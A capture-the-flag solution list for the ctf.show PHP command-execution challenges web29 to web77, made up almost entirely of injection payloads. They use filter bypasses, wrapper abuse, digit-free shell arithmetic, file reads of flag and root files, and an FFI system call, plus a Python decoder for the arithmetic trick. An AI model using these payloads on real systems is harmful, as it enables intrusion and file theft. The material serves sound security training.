[huayang]
web29
?c=echo `nl flag.php`
web30
?c=echo `nl fl\ag.p\hp`
web31
?c=highlight_file($_GET[1])?>&1=flag.php
web32
/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web33
/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web34
Same as above
/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web35
Same as above
/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web36
Same as above
/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web37
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web38
Same as above
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web39
?c=data:text/plain,<?php system('cat fla?.php')?>
web40
?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
web41
https://blog.csdn.net/miuzzx/article/details/108569080
web42
?c=cat flag.php;
The trailing ; is required
web43
web44
?c=nl fla\g.php||
web45
?c=nl<fl\ag.php||
web46
?c=nl<fl\ag.php||
web47
?c=nl<fl\ag.php||
web48
?c=nl<fl\ag.php||
web49
?c=nl<fl\ag.php||
web50
?c=nl<fl\ag.php||
web51
?c=nl<fl\ag.php||
web52
?c=nl${IFS}/fla\g||
web53
?c=nl${IFS}fla\g.php&
web54
?c=grep${IFS}'fla'${IFS}fla?.php
web55
First, write an HTML page that sends a POST file upload
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://09bc84d8-cb8a-43a0-8ca0-8b0df54b56e9.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!-- The URL is the link of the currently open challenge -->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
Upload a file and capture the request
payload :
?c=.+/???/????????[@-[]
#!/bin/sh
ls
#!/bin/sh
cat flag.php
Method 2
payload:?c=/???/????64%20/????.???
Does not work in Firefox
web56
Same as above
Digits are filtered, so method 2 cannot be used
web57
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))))))
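How a payload of this shape yields a number without containing any digits, as an added example that is not part of the original write-up: `$(())` expands to 0, `$((~0))` to -1, the concatenated -1 terms are summed by the inner `$(( ))`, and the outer `~` inverts the sum. The decoder below (the names `eval_flat` and `decode` are hypothetical) resolves such strings without invoking a shell, for example when triaging digit-free arithmetic expansions seen in request logs; the sample is constructed.

```python
import re

# Innermost arithmetic expansion: $(( ... )) with no nested "$(" inside it.
INNER = re.compile(r"\$\(\(([^$()]*)\)\)")


def eval_flat(expr: str) -> int:
    """Evaluate an expression made only of digits, '-', '~' and whitespace."""
    tokens = re.findall(r"\d+|[-~]", expr)
    if "".join(tokens) != "".join(expr.split()):
        raise ValueError(f"unsupported characters in {expr!r}")
    if not tokens:
        return 0  # the shell evaluates an empty $(( )) to 0
    pos = 0

    def unary() -> int:
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("truncated expression")
        tok = tokens[pos]
        pos += 1
        if tok == "~":
            return ~unary()
        if tok == "-":
            return -unary()
        return int(tok)

    value = unary()
    while pos < len(tokens):
        if tokens[pos] != "-":
            raise ValueError(f"unexpected token {tokens[pos]!r}")
        pos += 1
        value -= unary()
    return value


def decode(payload: str) -> int:
    """Resolve nested $(( )) expansions from the inside out, without a shell."""
    text, count = payload, 1
    while count:
        text, count = INNER.subn(lambda m: str(eval_flat(m.group(1))), text)
    return eval_flat(text)  # raises if anything but a plain number is left


# Constructed sample: 37 "-1" terms inside the inner $(( )), outer ~ on the sum.
TERM = "$((~$(())))"
SAMPLE = "$((~$((" + TERM * 37 + "))))"

if __name__ == "__main__":
    print(decode(SAMPLE))
```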
web58——web65
post:
c=show_source('flag.php')
web66——web70
post:
c=print_r(scandir("/"));
post:
c=highlight_file('flag.txt');
show_source() raises an error here
web71
c=$a=new DirectoryIterator("glob:///*"); foreach($a as $f){ echo $f." " ; } exit();
post:
c=include('/flag.txt');exit(0);
web72
Omitted
web73-74
Payload to list files
c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' '); }exit(0); ?>
c=include('/flagc.txt');exit(0);
web75-76
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);
web77
c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();
Then request 1.txt
[/huayang]
FROM:浅浅淡淡[hellohy]